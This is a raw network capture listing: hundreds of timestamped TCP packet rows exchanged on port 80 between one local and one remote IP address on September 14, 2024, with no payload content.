Sep 14, 2024 18:31:12.042525053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042541027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042551041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042565107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042574883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042582989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042589903 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042594910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042603970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042613983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042623997 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042624950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042637110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042653084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042660952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042663097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042675018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042704105 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042735100 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042745113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042756081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042764902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042774916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042788029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042797089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042799950 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042808056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042819977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042820930 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042841911 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042861938 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.042951107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042962074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042972088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042982101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.042990923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.043001890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.043008089 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.043046951 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.043077946 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.043226004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.043235064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.043240070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.043250084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.043257952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.043267965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.043277979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.043306112 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.043335915 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.051457882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.051501989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.051512003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.051599026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.051605940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.051616907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.051626921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.051680088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.051690102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.051762104 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.051762104 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.051763058 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.080691099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.080701113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.080707073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.080876112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.080885887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.080897093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.080908060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.080918074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.080984116 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.081074953 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.081074953 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.124058008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.124070883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.124079943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.124097109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.124105930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.124115944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.124128103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.124247074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.124258995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.124269962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.124273062 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.124274015 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.124279976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.124289989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.124326944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.124339104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.124346972 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.124368906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.124346972 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.124392986 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.124392986 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.127118111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127162933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127172947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127177954 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.127223015 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.127260923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127271891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127281904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127291918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127301931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127312899 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.127365112 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.127393007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127403021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127412081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127423048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127434015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127460003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.127494097 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.127685070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127696037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127711058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127721071 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127729893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127738953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127743006 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.127777100 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.127793074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127804041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.127829075 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.127861977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.128595114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.128652096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.128700972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.128712893 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.128751040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.128762007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.128802061 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.128839970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.128849983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.128859997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.128910065 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129067898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129080057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129090071 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129098892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129116058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129131079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129131079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129143953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129153013 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129154921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129177094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129204988 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129234076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129249096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129261971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129277945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129287958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129297018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129297018 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129308939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129317999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129333973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129343033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129353046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129353046 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129370928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129381895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129390001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129394054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129405022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129409075 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129415989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129431963 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129457951 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129489899 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129501104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129511118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129520893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129529953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129540920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129549980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129554033 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129561901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129574060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129595041 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129625082 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129767895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129777908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129784107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129787922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129797935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129842043 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129878998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129889965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129899979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129909039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129919052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129928112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129937887 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129980087 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.129982948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.129995108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.130006075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.130017042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.130026102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.130043030 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.130079031 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.130079031 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.130084991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.130095959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.130105019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.130115986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.130126953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.130136013 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.130142927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.130156040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.130165100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.130172014 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.130177021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.130187988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.130189896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.130201101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.130230904 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.138689041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.138700008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.138710022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.138725996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.138736010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.138747931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.138752937 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.138758898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.138794899 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.138828039 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.167836905 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.167853117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.167864084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.167874098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.167886019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.167896986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.167907000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.167917967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.168150902 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.168150902 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.168150902 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.212553024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.212568045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.212579966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.212589025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.212598085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.212753057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.212760925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.212769985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.212779045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.212788105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.212798119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.212806940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.212816000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.212825060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.212833881 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.212901115 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.212902069 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.212902069 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.212902069 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.212902069 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.213984966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.213995934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214005947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214102983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214112997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214123964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214133978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214144945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214207888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.214209080 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.214209080 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.214209080 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.214369059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214380026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214389086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214399099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214407921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214421988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214440107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214449883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214459896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214473009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214483023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214492083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214503050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.214600086 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.214601040 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.214601040 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.214601040 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.214601040 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.215553045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.215599060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.215610027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.215653896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.215722084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.215734005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.215745926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.215758085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.215770006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.215786934 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.215825081 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.215842962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.215854883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.215864897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.215877056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.215888023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.215898991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.215900898 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.215923071 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.215956926 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.216104984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216115952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216126919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216137886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216150045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216161013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216170073 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.216171980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216185093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216197014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216197014 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.216221094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216232061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216238022 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.216283083 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.216368914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216381073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216392040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216403961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216415882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216430902 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.216468096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216470957 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.216489077 CEST	80	49738	172.67.203.195	192.168.2.4
